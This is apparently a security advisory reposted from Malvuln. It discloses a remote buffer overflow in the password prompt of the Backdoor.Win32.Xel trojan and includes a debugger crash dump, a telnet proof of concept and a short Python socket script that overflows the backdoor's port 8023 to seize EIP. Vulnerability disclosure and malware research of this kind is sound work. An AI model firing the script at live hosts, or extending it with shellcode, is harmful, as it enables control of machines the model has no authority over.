Share
## https://sploitus.com/exploit?id=PACKETSTORM:161049
Discovery / credits: Malvuln - malvuln.com (c) 2021  
Original source: https://malvuln.com/advisory/3648c68bfe395fb9980ae547d881572c.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln  
  
Threat: Backdoor.Win32.Xel  
Vulnerability: Remote Authentication Buffer Overflow  
Description: Xel listens on TCP port 8023 and requires authentication good for them!, upon connecting you are greeted with a password prompt:  
  
XeL TROJAN based on ULTOR'S TROJAN  
  
password:  
  
For incorrect passwords we get "Wrong password" response. However, by entering a password with a length of about 125 characters, we trigger the buffer overflow vuln. Moreover, we can also send a larger payload using TCP socket to supply shellcode.  
  
Password string: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB  
  
The below PoC, last eight bytes 42424242 (B) will overwrite the instruction pointer (EIP), potentially allowing control of the malwares execution flow and undermining its authentication mechanism.  
  
Type: PE32  
MD5: 3648c68bfe395fb9980ae547d881572c  
Vuln ID: MVID-2021-0044  
Dropped files:   
ASLR: False  
DEP: False  
Safe SEH: True  
Disclosure: 01/21/2021  
  
Memory Dump:  
(13c.d54): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=42424242 edx=773e9d70 esi=00000000 edi=00000000  
eip=42424242 esp=000a1680 ebp=000a16a0 iopl=0 nv up ei pl zr na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
42424242 ?? ???  
  
  
0:000> !analyze -v  
*******************************************************************************  
* *  
* Exception Analysis *  
* *  
*******************************************************************************  
  
*** WARNING: Unable to verify checksum for Backdoor.Win32.Xel.3648c68bfe395fb9980ae547d881572c.exe  
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Xel.3648c68bfe395fb9980ae547d881572c.exe  
  
FAULTING_IP:   
Backdoor_Win32_Xel_3648c68bfe395fb9980ae547d881572c+3610  
00403610 8b4af8 mov ecx,dword ptr [edx-8]  
  
EXCEPTION_RECORD: 0019fa10 -- (.exr 0x19fa10)  
ExceptionAddress: 00403610 (Backdoor_Win32_Xel_3648c68bfe395fb9980ae547d881572c+0x00003610)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: 41414139  
Attempt to read from address 41414139  
  
PROCESS_NAME: Backdoor.Win32.Xel.3648c68bfe395fb9980ae547d881572c.exe  
  
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_PARAMETER1: 00000008  
  
EXCEPTION_PARAMETER2: 42424242  
  
WRITE_ADDRESS: 42424242   
  
FOLLOWUP_IP:   
kernel32!BaseThreadInitThunk+0  
76e38630 8bff mov edi,edi  
  
FAILED_INSTRUCTION_ADDRESS:   
+0  
42424242 ?? ???  
  
MOD_LIST: <ANALYSIS/>  
  
NTGLOBALFLAG: 0  
  
APPLICATION_VERIFIER_FLAGS: 0  
  
IP_ON_HEAP: 41414141  
The fault address in not in any loaded module, please check your build's rebase  
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may  
contain the address if it were loaded.  
  
IP_IN_FREE_BLOCK: 41414141  
  
CONTEXT: 0019fa60 -- (.cxr 0x19fa60)  
eax=0019ff44 ebx=0000007e ecx=532f749c edx=41414141 esi=0000007f edi=0000007f  
eip=00403610 esp=0019fec0 ebp=0019ff4c iopl=0 nv up ei pl nz na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206  
Backdoor_Win32_Xel_3648c68bfe395fb9980ae547d881572c+0x3610:  
00403610 8b4af8 mov ecx,dword ptr [edx-8] ds:002b:41414139=????????  
Resetting default scope  
  
ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]  
  
LAST_CONTROL_TRANSFER: from 41414141 to 00403610  
  
FAULTING_THREAD: ffffffff  
  
BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_42424242  
  
PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_42424242  
  
DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_42424242  
  
FRAME_ONE_INVALID: 1  
  
STACK_TEXT:   
0019fec0 00403610 backdoor_win32_xel+0x3610  
0019ff54 41414141 unknown!printable+0x0  
0019ff88 76e38654 kernel32!BaseThreadInitThunk+0x24  
0019ff9c 773c4a77 ntdll!__RtlUserThreadStart+0x2f  
0019ffe4 773c4a47 ntdll!_RtlUserThreadStart+0x1b  
  
  
SYMBOL_NAME: kernel32!BaseThreadInitThunk+0  
  
FOLLOWUP_NAME: MachineOwner  
  
MODULE_NAME: kernel32  
  
IMAGE_NAME: kernel32.dll  
  
DEBUG_FLR_IMAGE_TIMESTAMP: 744765ce  
  
STACK_COMMAND: .cxr 000000000019FA60 ; kb ; dds 19fec0 ; kb  
  
FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_42424242_c0000005_kernel32.dll!BaseThreadInitThunk  
  
BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_42424242_BAD_IP_kernel32!BaseThreadInitThunk+0  
  
  
Exploit/PoC-1:  
TELNET x.x.x.x 8023  
  
Enter a long string for password.  
  
  
Exploit/PoC-2:  
from socket import *  
  
MALWARE_HOST="x.x.x.x"  
PORT=8023  
  
def doit():  
s=socket(AF_INET, SOCK_STREAM)  
s.connect((MALWARE_HOST, PORT))  
  
PBARBAR="A"*200+" HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\r\n"  
s.send(PBARBAR)  
s.close()  
  
print("Backdoor.Win32.Xel / Remote Authentication Buffer Overflow")  
print("MD5: 3648c68bfe395fb9980ae547d881572c")  
print("By Malvuln");  
  
if __name__=="__main__":  
doit()  
  
  
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).